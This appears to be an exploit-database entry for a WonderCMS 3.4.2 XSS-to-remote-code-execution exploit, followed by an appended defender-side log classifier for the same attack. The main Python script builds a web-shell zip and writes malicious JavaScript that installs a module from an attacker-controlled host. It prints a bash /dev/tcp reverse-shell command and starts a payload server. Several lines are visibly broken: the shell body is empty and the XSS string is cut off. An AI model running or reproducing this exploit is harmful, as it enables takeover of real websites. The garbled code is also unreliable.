WonderCMS 3.4.2 – Remote Code Execution (RCE)

Exploit Details

Basic Information

Exploit Title WonderCMS 3.4.2 – Remote Code Execution (RCE)
Exploit ID EDB-ID:52271
Type exploitdb
Published 2025-04-22T00:00:00
Modified 2025-04-22T00:00:00

CVSS Information

CVSS Score 6.1
Severity MEDIUM
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE Information

  • CVE-2023-41425

Exploit Description

Exploit Title: WonderCMS 3.4.2 – Remote Code Execution (RCE) Date: 2025-04-16 Exploit Author: Milad…

Exploit Code

# Exploit Title: WonderCMS 3.4.2 – Remote Code Execution (RCE)
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# CVE: CVE-2023-41425

import requests
import argparse
from argparse import RawTextHelpFormatter
import os
import subprocess
import zipfile
from termcolor import colored

def main():
    parser = argparse.ArgumentParser(description="Exploit Wonder CMS v3.4.2 XSS to RCE", formatter_class=RawTextHelpFormatter)
    parser.add_argument("--url", required=True, help="Target URL of loginURL (Example: http://sea.htb/loginURL)")
    parser.add_argument("--xip", required=True, help="IP for HTTP web server that hosts the malicious .js file")
    parser.add_argument("--xport", required=True, help="Port for HTTP web server that hosts the malicious .js file")
    args = parser.parse_args()

    target_login_url = args.url
    target_split = args.url.split('/')
    target_url = target_split[0] + '//' + target_split[2]

    # Web Shell
    print("[+] Creating PHP Web Shell")
    if not os.path.exists('malicious'):
        os.mkdir('malicious')
        with open ('malicious/malicious.php', 'w') as f:
            f.write('')
        with zipfile.ZipFile('./malicious.zip', 'w') as z:
            z.write('malicious/malicious.php')
        os.remove('malicious/malicious.php')
        os.rmdir('malicious')
    else:
        print(colored("[!] Directory malicious already exists!", 'yellow'))

    # Malicious .js
    js = f'''var token = document.querySelectorAll('[name="token"]')[0].value;
var module_url = "{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token=" + token;
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("GET", module_url);
xhr.send();'''

    print("[+] Writing malicious.js")
    with open('malicious.js', 'w') as f:
        f.write(js)

    xss_payload = args.url.replace("loginURL", "index.php?page=loginURL?")+"\">
"+args.xip+":"+args.xport+"/malicious.js\">
    print(colored(f"{xss_payload}", 'red'))

    print("[+] Web Shell can be accessed once .zip file has been requested:")
    print(colored(f"{target_url}/themes/malicious/malicious.php?cmd=", 'red'))
    print("[+] To get a reverse shell connection run the following:")
    print(colored(f"curl -s '{target_url}/themes/malicious/malicious.php' --get --data-urlencode \"cmd=bash -c 'bash -i >& /dev/tcp// 0>&1'\" ", 'yellow'))

    print("[+] Starting HTTP server")
    subprocess.run(["python3", "-m", "http.server", "-b", args.xip, args.xport])

if __name__ == "__main__":
    main()
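
A defender-side view of the three requests this script leaves in the target's web server log: the `page=loginURL?` request carrying markup, the `installModule` fetch from an outside host, and the `.php` call under `/themes/` with a `cmd` parameter. This is an added example, not part of the original exploit or of WonderCMS; the access-log format, the trusted-host allowlist, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hosts that module installs are expected to come from (assumption; set per site).
TRUSTED_MODULE_HOSTS = {"github.com"}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    # Stage 1: markup characters in the `page` parameter (reflected XSS attempt).
    if any(c in v for v in params.get("page", []) for c in '"<>'):
        findings.append("xss-in-page-param")
    # Stage 2: module install pulled from a host outside the allowlist.
    for src in params.get("installModule", []):
        if urlsplit(src).hostname not in TRUSTED_MODULE_HOSTS:
            findings.append("untrusted-installModule")
    # Stage 3: PHP file under /themes/ invoked with a `cmd` parameter.
    if url.path.startswith("/themes/") and url.path.endswith(".php") and "cmd" in params:
        findings.append("themes-php-cmd")
    return findings

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Apr/2025:10:00:01 +0000] "GET /index.php?page=loginURL?%22%3E%3Ci%3E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Apr/2025:10:00:03 +0000] "GET /?installModule=http://203.0.113.5:8000/malicious.zip&directoryName=pwned&type=themes&token=abc123 HTTP/1.1" 302 0',
    '203.0.113.5 - - [16/Apr/2025:10:00:09 +0000] "GET /themes/malicious/malicious.php?cmd=id HTTP/1.1" 200 54',
    '198.51.100.7 - - [16/Apr/2025:10:01:00 +0000] "GET /?installModule=https://github.com/example/theme/archive/master.zip&directoryName=theme&type=themes&token=abc123 HTTP/1.1" 302 0',
    '198.51.100.9 - - [16/Apr/2025:10:02:00 +0000] "GET /themes/sky/css/style.css HTTP/1.1" 200 2048',
]

def scan(lines):
    """Map line index -> findings for every line that triggered a rule."""
    return {i: f for i, f in enumerate(map(classify, lines)) if f}

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG).items():
        print(idx, findings)
```

The three rules firing in sequence within a short window is a stronger signal than any one alone, since a trusted administrator can legitimately trigger `installModule`.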
